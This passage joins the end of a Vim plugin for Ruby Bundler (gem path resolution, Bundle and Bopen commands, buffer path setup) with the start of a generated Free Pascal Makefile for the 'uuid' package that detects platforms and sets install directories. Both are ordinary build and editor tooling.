isdirectory(dir) let files = split(glob(dir . '/*/' . name . '.gemspec'), "\n") if empty(files) let paths[name] = dir else let paths[name] = files[0][0 : -10-strlen(name)] endif break endif endfor endfor endfor for source in self._locked.path for [name, ver] in items(source.versions) if source.remote =~# '^\~/' let local = expand(source.remote) elseif source.remote !~# '^/' let local = simplify(self.real(source.remote)) else let local = source.remote endif let files = split(glob(local . '/*/' . name . '.gemspec'), "\n") if empty(files) let paths[name] = local else let paths[name] = files[0][0 : -10-strlen(name)] endif endfor endfor for source in self._locked.gem for [name, ver] in items(source.versions) for path in gem_paths let dir = path . '/gems/' . name . '-' . ver if isdirectory(dir) let paths[name] = dir break endif endfor if !has_key(paths, name) for path in gem_paths let dir = glob(path . '/gems/' . name . '-' . ver . '-*') if isdirectory(dir) let paths[name] = dir break endif endfor endif endfor endfor if has_key(self, '_projections_list') call remove(self, '_projections_list') endif let self._path_time = time let self._paths = paths let self._sorted = sort(values(paths)) let index = index(self._sorted, fnamemodify(self.lock(), ':h')) if index > 0 call insert(self._sorted, remove(self._sorted,index)) endif if len(self._sorted) > 1 && filereadable(self._sorted[1] . '/lib/tags') && \ !filereadable(self._sorted[1] . '/tags') let self._tags = 'lib/tags' endif call self.alter_buffer_paths() return paths endif return get(self,'_paths',{}) endfunction function! s:project_sorted() dict abort call self.paths() return get(self, '_sorted', []) endfunction function! s:project_tags() dict abort call self.paths() return get(self, '_tags', []) endfunction function! s:project_gems() dict abort return self.paths() endfunction function! s:project_versions() dict abort call self.locked() return get(self, '_versions', {}) endfunction function! s:project_has(gem) dict abort call self.locked() return has_key(self.versions(), a:gem) endfunction function! s:project_projections_list() dict abort call self.paths() if !has_key(self, '_projections_list') let self._projections_list = [] let list = self._projections_list if !empty(get(g:, 'gem_projections', {})) for name in keys(self.versions()) if has_key(g:gem_projections, name) call add(list, g:gem_projections[name]) endif endfor endif for path in self.sorted() if filereadable(path . '/lib/projections.json') call add(list, projectionist#json_parse(readfile(path . '/lib/projections.json'))) endif endfor endif return self._projections_list endfunction function! s:project_dependencies(gem, ...) dict abort let deps = a:0 ? a:1 : {} let paths = a:0 > 1 ? a:2 : self.paths() for dep in get(self._dependencies, a:gem, []) if !has_key(deps, dep) && has_key(paths, dep) let deps[dep] = paths[dep] call self.dependencies(dep, deps, paths) endif endfor return deps endfunction call s:add_methods('project', ['locked', 'gems', 'paths', 'sorted', 'versions', 'has', 'dependencies', 'projections_list']) " Section: Buffer let s:buffer_prototype = {} function! s:buffer(...) abort let buffer = {'#': bufnr(a:0 ? a:1 : '%')} call extend(extend(buffer,s:buffer_prototype,'keep'),s:abstract_prototype,'keep') if !empty(buffer.getvar('bundler_lock')) return buffer endif call s:throw('not a Bundler project: '.(a:0 ? a:1 : expand('%'))) endfunction function! bundler#buffer(...) abort return s:buffer(a:0 ? a:1 : '%') endfunction function! s:buffer_getvar(var) dict abort return getbufvar(self['#'],a:var) endfunction function! s:buffer_setvar(var,value) dict abort return setbufvar(self['#'],a:var,a:value) endfunction function! s:buffer_project() dict abort return s:project(self.getvar('bundler_lock')) endfunction call s:add_methods('buffer',['getvar','setvar','project']) " Section: Bundle function! s:push_chdir() abort if !exists("s:command_stack") | let s:command_stack = [] | endif let chdir = exists("*haslocaldir") && haslocaldir() ? "lchdir " : "chdir " call add(s:command_stack,chdir.s:fnameescape(getcwd())) exe chdir.'`=s:project().real()`' endfunction function! s:pop_command() abort if exists("s:command_stack") && len(s:command_stack) > 0 exe remove(s:command_stack,-1) endif endfunction function! s:Bundle(bang,arg) abort let old_makeprg = &l:makeprg let old_errorformat = &l:errorformat let old_compiler = get(b:, 'current_compiler', '') let cd = exists('*haslocaldir') && haslocaldir() ? 'lcd' : 'cd' let cwd = getcwd() try execute cd fnameescape(s:project().real()) if a:arg =~# '^\s*console\>' let arg = substitute(a:arg, '^\s*console\s*', '', '') if exists(':Start') > 1 execute 'Start'.a:bang '-title=' . \ escape(fnamemodify(s:project().real(), ':t'), ' ') . \ '\ console bundle console' arg else execute '!bundle console' arg endif else compiler bundler execute 'make! '.a:arg if a:bang ==# '' return 'if !empty(getqflist()) | cfirst | endif' else return '' endif endif finally let &l:errorformat = old_errorformat let &l:makeprg = old_makeprg let b:current_compiler = old_compiler if empty(b:current_compiler) unlet b:current_compiler endif execute cd fnameescape(cwd) endtry endfunction function! s:BundleComplete(A, L, P) abort return bundler#complete(a:A, a:L, a:P, bundler#project()) endfunction function! bundler#complete(A, L, P, ...) abort let project = a:0 ? a:1 : bundler#project(getcwd()) if !empty(project) && a:L =~# '\s\+\%(show\|update\) ' return s:completion_filter(keys(project.paths()), a:A) endif return s:completion_filter(['install','update','exec','package','config','check','list','show','outdated','console','viz','benchmark'], a:A) endfunction call s:command("-bar -bang -nargs=? -complete=customlist,s:BundleComplete Bundle :execute s:Bundle('<bang>',<q-args>)") function! s:IsBundlerMake() abort return &makeprg =~# '^bundle' && exists('b:bundler_lock') endfunction function! s:QuickFixCmdPreMake() abort if !s:IsBundlerMake() return endif call s:push_chdir() endfunction function! s:QuickFixCmdPostMake() abort if !s:IsBundlerMake() return endif call s:pop_command() call s:project().paths('refresh') endfunction augroup bundler_command autocmd QuickFixCmdPre *make* call s:QuickFixCmdPreMake() autocmd QuickFixCmdPost *make* call s:QuickFixCmdPostMake() autocmd User Bundler \ if exists(':Console') < 2 | \ exe "command! -buffer -bar -bang -nargs=* Console :Bundle<bang> console <args>" | \ endif augroup END " Section: Bopen function! s:Open(cmd,gem,lcd) abort if a:gem ==# '' && a:lcd return a:cmd.' '.fnameescape(s:project().manifest()) elseif a:gem ==# '' return a:cmd.' '.fnameescape(s:project().lock()) else if !has_key(s:project().paths(), a:gem) call s:project().paths('refresh') endif if !has_key(s:project().paths(), a:gem) if has_key(s:project().versions(), a:gem) let v:errmsg = "Gem \"".a:gem."\" is in bundle but not installed" else let v:errmsg = "Gem \"".a:gem."\" is not in bundle" endif return 'echoerr v:errmsg' endif let path = fnameescape(s:project().paths()[a:gem]) let exec = a:cmd.' '.path if a:cmd =~# '^pedit' && a:lcd let exec .= '|wincmd P|lcd '.path.'|wincmd p' elseif a:lcd let exec .= '|lcd '.path endif return exec endif endfunction function! s:OpenComplete(A,L,P) abort return s:completion_filter(keys(s:project().paths()),a:A) endfunction call s:command("-bar -bang -nargs=? -complete=customlist,s:OpenComplete Bopen :execute s:Open('edit<bang>',<q-args>,1)") call s:command("-bar -bang -nargs=? -complete=customlist,s:OpenComplete Bedit :execute s:Open('edit<bang>',<q-args>,0)") call s:command("-bar -bang -nargs=? -complete=customlist,s:OpenComplete Bsplit :execute s:Open('split',<q-args>,<bang>1)") call s:command("-bar -bang -nargs=? -complete=customlist,s:OpenComplete Bvsplit :execute s:Open('vsplit',<q-args>,<bang>1)") call s:command("-bar -bang -nargs=? -complete=customlist,s:OpenComplete Btabedit :execute s:Open('tabedit',<q-args>,<bang>1)") call s:command("-bar -bang -nargs=? -complete=customlist,s:OpenComplete Bpedit :execute s:Open('pedit',<q-args>,<bang>1)") " Section: Paths function! s:build_path_option(paths,suffix) abort return join(map(copy(a:paths),'",".escape(s:shellslash(v:val."/".a:suffix),", ")'),'') endfunction function! s:buffer_alter_paths() dict abort if self.getvar('&suffixesadd') =~# '\.rb\>' let gem = self.getvar('bundler_gem') if empty(gem) let new = self.project().sorted() else let new = sort(values(self.project().dependencies(gem))) endif let old = type(self.getvar('bundler_paths')) == type([]) ? self.getvar('bundler_paths') : [] for [option, suffix] in \ [['tags', get(self.project(), '_tags', 'tags')], ['path', 'lib']] let value = self.getvar('&'.option) if !empty(old) let drop = s:build_path_option(old,suffix) let index = stridx(value,drop) if index > 0 let value = value[0:index-1] . value[index+strlen(drop):-1] endif endif call self.setvar('&'.option,value.s:build_path_option(new,suffix)) endfor call self.setvar('bundler_paths',new) endif endfunction call s:add_methods('buffer',['alter_paths']) function! s:project_alter_buffer_paths() dict abort for bufnr in range(1,bufnr('$')) if getbufvar(bufnr,'bundler_lock') ==# self.lock() let vim_parsing_quirk = s:buffer(bufnr).alter_paths() endif if getbufvar(bufnr, '&syntax') ==# 'gemfilelock' call setbufvar(bufnr, '&syntax', 'gemfilelock') endif endfor endfunction call s:add_methods('project',['alter_buffer_paths']) augroup bundler_path autocmd! autocmd User Bundler call s:buffer().alter_paths() augroup END " vim:set sw=2 sts=2:
{ "pile_set_name": "Github" }
# # Don't edit, this file is generated by FPCMake Version 2.0.0 # default: all MAKEFILETARGETS=i386-linux i386-go32v2 i386-win32 i386-os2 i386-freebsd i386-beos i386-haiku i386-netbsd i386-solaris i386-netware i386-openbsd i386-wdosx i386-darwin i386-emx i386-watcom i386-netwlibc i386-wince i386-embedded i386-symbian i386-nativent i386-iphonesim i386-android i386-aros m68k-linux m68k-netbsd m68k-amiga m68k-atari m68k-palmos m68k-macosclassic m68k-embedded powerpc-linux powerpc-netbsd powerpc-amiga powerpc-macosclassic powerpc-darwin powerpc-morphos powerpc-embedded powerpc-wii powerpc-aix sparc-linux sparc-netbsd sparc-solaris sparc-embedded x86_64-linux x86_64-freebsd x86_64-haiku x86_64-netbsd x86_64-solaris x86_64-openbsd x86_64-darwin x86_64-win64 x86_64-embedded x86_64-iphonesim x86_64-android x86_64-aros x86_64-dragonfly arm-linux arm-netbsd arm-palmos arm-wince arm-gba arm-nds arm-embedded arm-symbian arm-android arm-aros arm-freertos arm-ios powerpc64-linux powerpc64-darwin powerpc64-embedded powerpc64-aix avr-embedded armeb-linux armeb-embedded mips-linux mipsel-linux mipsel-embedded mipsel-android mips64el-linux jvm-java jvm-android i8086-embedded i8086-msdos i8086-win16 aarch64-linux aarch64-darwin aarch64-win64 aarch64-android aarch64-ios wasm-wasm sparc64-linux riscv32-linux riscv32-embedded riscv64-linux riscv64-embedded xtensa-linux xtensa-embedded xtensa-freertos z80-embedded z80-zxspectrum z80-msxdos BSDs = freebsd netbsd openbsd darwin dragonfly UNIXs = linux $(BSDs) solaris qnx haiku aix LIMIT83fs = go32v2 os2 emx watcom msdos win16 atari OSNeedsComspecToRunBatch = go32v2 watcom FORCE: .PHONY: FORCE override PATH:=$(patsubst %/,%,$(subst \,/,$(PATH))) ifneq ($(findstring darwin,$(OSTYPE)),) inUnix=1 #darwin SEARCHPATH:=$(filter-out .,$(subst :, ,$(PATH))) else ifeq ($(findstring ;,$(PATH)),) inUnix=1 SEARCHPATH:=$(filter-out .,$(subst :, ,$(PATH))) else SEARCHPATH:=$(subst ;, ,$(PATH)) endif endif SEARCHPATH+=$(patsubst %/,%,$(subst \,/,$(dir $(MAKE)))) PWD:=$(strip $(wildcard $(addsuffix /pwd.exe,$(SEARCHPATH)))) ifeq ($(PWD),) PWD:=$(strip $(wildcard $(addsuffix /pwd,$(SEARCHPATH)))) ifeq ($(PWD),) $(error You need the GNU utils package to use this Makefile) else PWD:=$(firstword $(PWD)) SRCEXEEXT= endif else PWD:=$(firstword $(PWD)) SRCEXEEXT=.exe endif ifndef inUnix ifeq ($(OS),Windows_NT) inWinNT=1 else ifdef OS2_SHELL inOS2=1 endif endif else ifneq ($(findstring cygdrive,$(PATH)),) inCygWin=1 endif endif ifdef inUnix SRCBATCHEXT=.sh else ifdef inOS2 SRCBATCHEXT=.cmd else SRCBATCHEXT=.bat endif endif ifdef COMSPEC ifneq ($(findstring $(OS_SOURCE),$(OSNeedsComspecToRunBatch)),) ifndef RUNBATCH RUNBATCH=$(COMSPEC) /C endif endif endif ifdef inUnix PATHSEP=/ else PATHSEP:=$(subst /,\,/) ifdef inCygWin PATHSEP=/ endif endif ifdef PWD BASEDIR:=$(subst \,/,$(shell $(PWD))) ifdef inCygWin ifneq ($(findstring /cygdrive/,$(BASEDIR)),) BASENODIR:=$(patsubst /cygdrive%,%,$(BASEDIR)) BASEDRIVE:=$(firstword $(subst /, ,$(BASENODIR))) BASEDIR:=$(subst /cygdrive/$(BASEDRIVE)/,$(BASEDRIVE):/,$(BASEDIR)) endif endif else BASEDIR=. endif ifdef inOS2 ifndef ECHO ECHO:=$(strip $(wildcard $(addsuffix /gecho$(SRCEXEEXT),$(SEARCHPATH)))) ifeq ($(ECHO),) ECHO:=$(strip $(wildcard $(addsuffix /echo$(SRCEXEEXT),$(SEARCHPATH)))) ifeq ($(ECHO),) ECHO=echo else ECHO:=$(firstword $(ECHO)) endif else ECHO:=$(firstword $(ECHO)) endif endif export ECHO endif override DEFAULT_FPCDIR=../.. ifndef FPC ifdef PP FPC=$(PP) endif endif ifndef FPC FPCPROG:=$(strip $(wildcard $(addsuffix /fpc$(SRCEXEEXT),$(SEARCHPATH)))) ifneq ($(FPCPROG),) FPCPROG:=$(firstword $(FPCPROG)) ifneq ($(CPU_TARGET),) FPC:=$(shell $(FPCPROG) -P$(CPU_TARGET) -PB) else FPC:=$(shell $(FPCPROG) -PB) endif ifneq ($(findstring Error,$(FPC)),) override FPC=$(firstword $(strip $(wildcard $(addsuffix /ppc386$(SRCEXEEXT),$(SEARCHPATH))))) else ifeq ($(strip $(wildcard $(FPC))),) FPC:=$(firstword $(FPCPROG)) endif endif else override FPC=$(firstword $(strip $(wildcard $(addsuffix /ppc386$(SRCEXEEXT),$(SEARCHPATH))))) endif endif override FPC:=$(subst $(SRCEXEEXT),,$(FPC)) override FPC:=$(subst \,/,$(FPC))$(SRCEXEEXT) FOUNDFPC:=$(strip $(wildcard $(FPC))) ifeq ($(FOUNDFPC),) FOUNDFPC=$(strip $(wildcard $(addsuffix /$(FPC),$(SEARCHPATH)))) ifeq ($(FOUNDFPC),) $(error Compiler $(FPC) not found) endif endif ifndef FPC_COMPILERINFO FPC_COMPILERINFO:=$(shell $(FPC) -iVSPTPSOTO) endif ifndef FPC_VERSION FPC_VERSION:=$(word 1,$(FPC_COMPILERINFO)) endif export FPC FPC_VERSION FPC_COMPILERINFO unexport CHECKDEPEND ALLDEPENDENCIES ifndef CPU_TARGET ifdef CPU_TARGET_DEFAULT CPU_TARGET=$(CPU_TARGET_DEFAULT) endif endif ifndef OS_TARGET ifdef OS_TARGET_DEFAULT OS_TARGET=$(OS_TARGET_DEFAULT) endif endif ifndef CPU_SOURCE CPU_SOURCE:=$(word 2,$(FPC_COMPILERINFO)) endif ifndef CPU_TARGET CPU_TARGET:=$(word 3,$(FPC_COMPILERINFO)) endif ifndef OS_SOURCE OS_SOURCE:=$(word 4,$(FPC_COMPILERINFO)) endif ifndef OS_TARGET OS_TARGET:=$(word 5,$(FPC_COMPILERINFO)) endif FULL_TARGET=$(CPU_TARGET)-$(OS_TARGET) FULL_SOURCE=$(CPU_SOURCE)-$(OS_SOURCE) ifeq ($(CPU_TARGET),armeb) ARCH=arm override FPCOPT+=-Cb else ifeq ($(CPU_TARGET),armel) ARCH=arm override FPCOPT+=-CaEABI else ARCH=$(CPU_TARGET) endif endif ifeq ($(FULL_TARGET),arm-embedded) ifeq ($(SUBARCH),) $(error When compiling for arm-embedded, a sub-architecture (e.g. SUBARCH=armv4t or SUBARCH=armv7m) must be defined) endif override FPCOPT+=-Cp$(SUBARCH) endif ifeq ($(FULL_TARGET),avr-embedded) ifeq ($(SUBARCH),) $(error When compiling for avr-embedded, a sub-architecture (e.g. SUBARCH=avr25 or SUBARCH=avr35) must be defined) endif override FPCOPT+=-Cp$(SUBARCH) endif ifeq ($(FULL_TARGET),mipsel-embedded) ifeq ($(SUBARCH),) $(error When compiling for mipsel-embedded, a sub-architecture (e.g. SUBARCH=pic32mx) must be defined) endif override FPCOPT+=-Cp$(SUBARCH) endif ifeq ($(FULL_TARGET),xtensa-embedded) ifeq ($(SUBARCH),) $(error When compiling for xtensa-embedded, a sub-architecture (e.g. SUBARCH=lx106 or SUBARCH=lx6) must be defined) endif override FPCOPT+=-Cp$(SUBARCH) endif ifeq ($(FULL_TARGET),xtensa-freertos) ifeq ($(SUBARCH),) $(error When compiling for xtensa-freertos, a sub-architecture (e.g. SUBARCH=lx106 or SUBARCH=lx6) must be defined) endif override FPCOPT+=-Cp$(SUBARCH) endif ifeq ($(FULL_TARGET),arm-freertos) ifeq ($(SUBARCH),) $(error When compiling for arm-freertos, a sub-architecture (e.g. SUBARCH=armv6m or SUBARCH=armv7em) must be defined) endif override FPCOPT+=-Cp$(SUBARCH) endif ifneq ($(findstring $(OS_SOURCE),$(LIMIT83fs)),) TARGETSUFFIX=$(OS_TARGET) SOURCESUFFIX=$(OS_SOURCE) else ifneq ($(findstring $(OS_TARGET),$(LIMIT83fs)),) TARGETSUFFIX=$(OS_TARGET) else TARGETSUFFIX=$(FULL_TARGET) endif SOURCESUFFIX=$(FULL_SOURCE) endif ifneq ($(FULL_TARGET),$(FULL_SOURCE)) CROSSCOMPILE=1 endif ifeq ($(findstring makefile,$(MAKECMDGOALS)),) ifeq ($(findstring $(FULL_TARGET),$(MAKEFILETARGETS)),) $(error The Makefile doesn't support target $(FULL_TARGET), please run fpcmake first) endif endif ifneq ($(findstring $(OS_TARGET),$(BSDs)),) BSDhier=1 endif ifeq ($(OS_TARGET),linux) linuxHier=1 endif ifndef CROSSCOMPILE BUILDFULLNATIVE=1 export BUILDFULLNATIVE endif ifdef BUILDFULLNATIVE BUILDNATIVE=1 export BUILDNATIVE endif export OS_TARGET OS_SOURCE ARCH CPU_TARGET CPU_SOURCE FULL_TARGET FULL_SOURCE TARGETSUFFIX SOURCESUFFIX CROSSCOMPILE ifdef FPCDIR override FPCDIR:=$(subst \,/,$(FPCDIR)) ifeq ($(wildcard $(addprefix $(FPCDIR)/,rtl)),) override FPCDIR=wrong endif else override FPCDIR=wrong endif ifdef DEFAULT_FPCDIR ifeq ($(FPCDIR),wrong) override FPCDIR:=$(subst \,/,$(DEFAULT_FPCDIR)) ifeq ($(wildcard $(addprefix $(FPCDIR)/,rtl)),) override FPCDIR=wrong endif endif endif ifeq ($(FPCDIR),wrong) ifdef inUnix override FPCDIR=/usr/local/lib/fpc/$(FPC_VERSION) ifeq ($(wildcard $(FPCDIR)/units),) override FPCDIR=/usr/lib/fpc/$(FPC_VERSION) endif else override FPCDIR:=$(subst /$(FPC),,$(firstword $(strip $(wildcard $(addsuffix /$(FPC),$(SEARCHPATH)))))) override FPCDIR:=$(FPCDIR)/.. ifeq ($(wildcard $(addprefix $(FPCDIR)/,rtl)),) override FPCDIR:=$(FPCDIR)/.. ifeq ($(wildcard $(addprefix $(FPCDIR)/,rtl)),) override FPCDIR:=$(BASEDIR) ifeq ($(wildcard $(addprefix $(FPCDIR)/,rtl)),) override FPCDIR=c:/pp endif endif endif endif endif ifndef CROSSBINDIR CROSSBINDIR:=$(wildcard $(FPCDIR)/bin/$(TARGETSUFFIX)) endif ifneq ($(findstring $(OS_TARGET),darwin iphonesim ios),) ifneq ($(findstring $(OS_SOURCE),darwin ios),) DARWIN2DARWIN=1 endif endif ifndef BINUTILSPREFIX ifndef CROSSBINDIR ifdef CROSSCOMPILE ifneq ($(OS_TARGET),msdos) ifndef DARWIN2DARWIN ifneq ($(CPU_TARGET),jvm) BINUTILSPREFIX=$(CPU_TARGET)-$(OS_TARGET)- ifeq ($(OS_TARGET),android) ifeq ($(CPU_TARGET),arm) BINUTILSPREFIX=arm-linux-androideabi- else ifeq ($(CPU_TARGET),i386) BINUTILSPREFIX=i686-linux-android- else BINUTILSPREFIX=$(CPU_TARGET)-linux-android- endif endif endif endif endif else BINUTILSPREFIX=$(OS_TARGET)- endif endif endif endif UNITSDIR:=$(wildcard $(FPCDIR)/units/$(TARGETSUFFIX)) ifeq ($(UNITSDIR),) UNITSDIR:=$(wildcard $(FPCDIR)/units/$(OS_TARGET)) endif PACKAGESDIR:=$(wildcard $(FPCDIR) $(FPCDIR)/packages) ifndef FPCFPMAKE ifdef CROSSCOMPILE ifeq ($(strip $(wildcard $(addsuffix /compiler/ppc$(SRCEXEEXT),$(FPCDIR)))),) FPCPROG:=$(strip $(wildcard $(addsuffix /fpc$(SRCEXEEXT),$(SEARCHPATH)))) ifneq ($(FPCPROG),) FPCPROG:=$(firstword $(FPCPROG)) FPCFPMAKE:=$(shell $(FPCPROG) -PB) ifeq ($(strip $(wildcard $(FPCFPMAKE))),) FPCFPMAKE:=$(firstword $(FPCPROG)) endif else override FPCFPMAKE=$(firstword $(strip $(wildcard $(addsuffix /ppc386$(SRCEXEEXT),$(SEARCHPATH))))) endif else FPCFPMAKE=$(strip $(wildcard $(addsuffix /compiler/ppc$(SRCEXEEXT),$(FPCDIR)))) FPMAKE_SKIP_CONFIG=-n export FPCFPMAKE export FPMAKE_SKIP_CONFIG endif else FPMAKE_SKIP_CONFIG=-n FPCFPMAKE=$(FPC) endif endif override PACKAGE_NAME=uuid override PACKAGE_VERSION=3.3.1 FPMAKE_BIN_CLEAN=$(wildcard ./fpmake$(SRCEXEEXT)) ifdef OS_TARGET FPC_TARGETOPT+=--os=$(OS_TARGET) endif ifdef CPU_TARGET FPC_TARGETOPT+=--cpu=$(CPU_TARGET) endif LOCALFPMAKE=./fpmake$(SRCEXEEXT) override INSTALL_FPCPACKAGE=y ifdef REQUIRE_UNITSDIR override UNITSDIR+=$(REQUIRE_UNITSDIR) endif ifdef REQUIRE_PACKAGESDIR override PACKAGESDIR+=$(REQUIRE_PACKAGESDIR) endif ifdef ZIPINSTALL ifneq ($(findstring $(OS_TARGET),$(UNIXs)),) UNIXHier=1 endif else ifneq ($(findstring $(OS_SOURCE),$(UNIXs)),) UNIXHier=1 endif endif ifndef INSTALL_PREFIX ifdef PREFIX INSTALL_PREFIX=$(PREFIX) endif endif ifndef INSTALL_PREFIX ifdef UNIXHier INSTALL_PREFIX=/usr/local else ifdef INSTALL_FPCPACKAGE INSTALL_BASEDIR:=/pp else INSTALL_BASEDIR:=/$(PACKAGE_NAME) endif endif endif export INSTALL_PREFIX ifdef INSTALL_FPCSUBDIR export INSTALL_FPCSUBDIR endif ifndef DIST_DESTDIR DIST_DESTDIR:=$(BASEDIR) endif export DIST_DESTDIR ifndef COMPILER_UNITTARGETDIR ifdef PACKAGEDIR_MAIN COMPILER_UNITTARGETDIR=$(PACKAGEDIR_MAIN)/units/$(TARGETSUFFIX) else COMPILER_UNITTARGETDIR=units/$(TARGETSUFFIX) endif endif ifndef COMPILER_TARGETDIR COMPILER_TARGETDIR=. endif ifndef INSTALL_BASEDIR ifdef UNIXHier ifdef INSTALL_FPCPACKAGE INSTALL_BASEDIR:=$(INSTALL_PREFIX)/lib/fpc/$(FPC_VERSION) else INSTALL_BASEDIR:=$(INSTALL_PREFIX)/lib/$(PACKAGE_NAME) endif else INSTALL_BASEDIR:=$(INSTALL_PREFIX) endif endif ifndef INSTALL_BINDIR ifdef UNIXHier INSTALL_BINDIR:=$(INSTALL_PREFIX)/bin else INSTALL_BINDIR:=$(INSTALL_BASEDIR)/bin ifdef INSTALL_FPCPACKAGE ifdef CROSSCOMPILE ifdef CROSSINSTALL INSTALL_BINDIR:=$(INSTALL_BINDIR)/$(SOURCESUFFIX) else INSTALL_BINDIR:=$(INSTALL_BINDIR)/$(TARGETSUFFIX) endif else INSTALL_BINDIR:=$(INSTALL_BINDIR)/$(TARGETSUFFIX) endif endif endif endif ifndef INSTALL_UNITDIR INSTALL_UNITDIR:=$(INSTALL_BASEDIR)/units/$(TARGETSUFFIX) ifdef INSTALL_FPCPACKAGE ifdef PACKAGE_NAME INSTALL_UNITDIR:=$(INSTALL_UNITDIR)/$(PACKAGE_NAME) endif endif endif ifndef INSTALL_LIBDIR ifdef UNIXHier INSTALL_LIBDIR:=$(INSTALL_PREFIX)/lib else INSTALL_LIBDIR:=$(INSTALL_UNITDIR) endif endif ifndef INSTALL_SOURCEDIR ifdef UNIXHier ifdef BSDhier SRCPREFIXDIR=share/src else ifdef linuxHier SRCPREFIXDIR=share/src else SRCPREFIXDIR=src endif endif ifdef INSTALL_FPCPACKAGE ifdef INSTALL_FPCSUBDIR INSTALL_SOURCEDIR:=$(INSTALL_PREFIX)/$(SRCPREFIXDIR)/fpc-$(FPC_VERSION)/$(INSTALL_FPCSUBDIR)/$(PACKAGE_NAME) else INSTALL_SOURCEDIR:=$(INSTALL_PREFIX)/$(SRCPREFIXDIR)/fpc-$(FPC_VERSION)/$(PACKAGE_NAME) endif else INSTALL_SOURCEDIR:=$(INSTALL_PREFIX)/$(SRCPREFIXDIR)/$(PACKAGE_NAME)-$(PACKAGE_VERSION) endif else ifdef INSTALL_FPCPACKAGE ifdef INSTALL_FPCSUBDIR INSTALL_SOURCEDIR:=$(INSTALL_BASEDIR)/source/$(INSTALL_FPCSUBDIR)/$(PACKAGE_NAME) else INSTALL_SOURCEDIR:=$(INSTALL_BASEDIR)/source/$(PACKAGE_NAME) endif else INSTALL_SOURCEDIR:=$(INSTALL_BASEDIR)/source endif endif endif ifndef INSTALL_DOCDIR ifdef UNIXHier ifdef BSDhier DOCPREFIXDIR=share/doc else ifdef linuxHier DOCPREFIXDIR=share/doc else DOCPREFIXDIR=doc endif endif ifdef INSTALL_FPCPACKAGE INSTALL_DOCDIR:=$(INSTALL_PREFIX)/$(DOCPREFIXDIR)/fpc-$(FPC_VERSION)/$(PACKAGE_NAME) else INSTALL_DOCDIR:=$(INSTALL_PREFIX)/$(DOCPREFIXDIR)/$(PACKAGE_NAME)-$(PACKAGE_VERSION) endif else ifdef INSTALL_FPCPACKAGE INSTALL_DOCDIR:=$(INSTALL_BASEDIR)/doc/$(PACKAGE_NAME) else INSTALL_DOCDIR:=$(INSTALL_BASEDIR)/doc endif endif endif ifndef INSTALL_EXAMPLEDIR ifdef UNIXHier ifdef INSTALL_FPCPACKAGE ifdef BSDhier INSTALL_EXAMPLEDIR:=$(INSTALL_PREFIX)/share/examples/fpc-$(FPC_VERSION)/$(PACKAGE_NAME) else ifdef linuxHier INSTALL_EXAMPLEDIR:=$(INSTALL_DOCDIR)/examples else INSTALL_EXAMPLEDIR:=$(INSTALL_PREFIX)/doc/fpc-$(FPC_VERSION)/examples/$(PACKAGE_NAME) endif endif else ifdef BSDhier INSTALL_EXAMPLEDIR:=$(INSTALL_PREFIX)/share/examples/$(PACKAGE_NAME)-$(PACKAGE_VERSION) else ifdef linuxHier INSTALL_EXAMPLEDIR:=$(INSTALL_DOCDIR)/examples/$(PACKAGE_NAME)-$(PACKAGE_VERSION) else INSTALL_EXAMPLEDIR:=$(INSTALL_PREFIX)/doc/$(PACKAGE_NAME)-$(PACKAGE_VERSION) endif endif endif else ifdef INSTALL_FPCPACKAGE INSTALL_EXAMPLEDIR:=$(INSTALL_BASEDIR)/examples/$(PACKAGE_NAME) else INSTALL_EXAMPLEDIR:=$(INSTALL_BASEDIR)/examples endif endif endif ifndef INSTALL_DATADIR INSTALL_DATADIR=$(INSTALL_BASEDIR) endif ifndef INSTALL_SHAREDDIR INSTALL_SHAREDDIR=$(INSTALL_PREFIX)/lib endif ifdef CROSSCOMPILE ifndef CROSSBINDIR CROSSBINDIR:=$(wildcard $(CROSSTARGETDIR)/bin/$(SOURCESUFFIX)) ifeq ($(CROSSBINDIR),) CROSSBINDIR:=$(wildcard $(INSTALL_BASEDIR)/cross/$(TARGETSUFFIX)/bin/$(FULL_SOURCE)) endif endif else CROSSBINDIR= endif ifeq ($(OS_SOURCE),linux) ifndef GCCLIBDIR ifeq ($(CPU_TARGET),i386) ifneq ($(findstring x86_64,$(shell uname -a)),) ifeq ($(BINUTILSPREFIX),) GCCLIBDIR:=$(shell dirname `gcc -m32 -print-libgcc-file-name`) else CROSSGCCOPT=-m32 endif endif endif ifeq ($(CPU_TARGET),powerpc) ifeq ($(BINUTILSPREFIX),) GCCLIBDIR:=$(shell dirname `gcc -m32 -print-libgcc-file-name`) else CROSSGCCOPT=-m32 endif endif ifeq ($(CPU_TARGET),powerpc64) ifeq ($(BINUTILSPREFIX),) GCCLIBDIR:=$(shell dirname `gcc -m64 -print-libgcc-file-name`) else CROSSGCCOPT=-m64 endif endif ifeq ($(CPU_TARGET),sparc) ifneq ($(findstring sparc64,$(shell uname -a)),) ifeq ($(BINUTILSPREFIX),) GCCLIBDIR:=$(shell dirname `gcc -m32 -print-libgcc-file-name`) else CROSSGCCOPT=-m32 endif endif endif endif ifdef FPCFPMAKE FPCFPMAKE_CPU_TARGET=$(shell $(FPCFPMAKE) -iTP) ifeq ($(CPU_TARGET),$(FPCFPMAKE_CPU_TARGET)) FPCMAKEGCCLIBDIR:=$(GCCLIBDIR) endif endif ifndef FPCMAKEGCCLIBDIR FPCMAKEGCCLIBDIR:=$(shell dirname `gcc -print-libgcc-file-name`) endif ifndef GCCLIBDIR CROSSGCC=$(strip $(wildcard $(addsuffix /$(BINUTILSPREFIX)gcc$(SRCEXEEXT),$(SEARCHPATH)))) ifneq ($(CROSSGCC),) GCCLIBDIR:=$(shell dirname `$(CROSSGCC) $(CROSSGCCOPT) -print-libgcc-file-name`) endif endif endif ifdef inUnix ifeq ($(OS_SOURCE),netbsd) OTHERLIBDIR:=/usr/pkg/lib endif export GCCLIBDIR FPCMAKEGCCLIBDIR OTHERLIBDIR endif BATCHEXT=.bat LOADEREXT=.as EXEEXT=.exe PPLEXT=.ppl PPUEXT=.ppu OEXT=.o LTOEXT=.bc ASMEXT=.s SMARTEXT=.sl STATICLIBEXT=.a SHAREDLIBEXT=.so SHAREDLIBPREFIX=libfp STATICLIBPREFIX=libp IMPORTLIBPREFIX=libimp RSTEXT=.rst EXEDBGEXT=.dbg ifeq ($(OS_TARGET),go32v1) STATICLIBPREFIX= SHORTSUFFIX=v1 endif ifeq ($(OS_TARGET),go32v2) STATICLIBPREFIX= SHORTSUFFIX=dos IMPORTLIBPREFIX= endif ifeq ($(OS_TARGET),watcom) STATICLIBPREFIX= OEXT=.obj ASMEXT=.asm SHAREDLIBEXT=.dll SHORTSUFFIX=wat IMPORTLIBPREFIX= endif ifneq ($(CPU_TARGET),jvm) ifeq 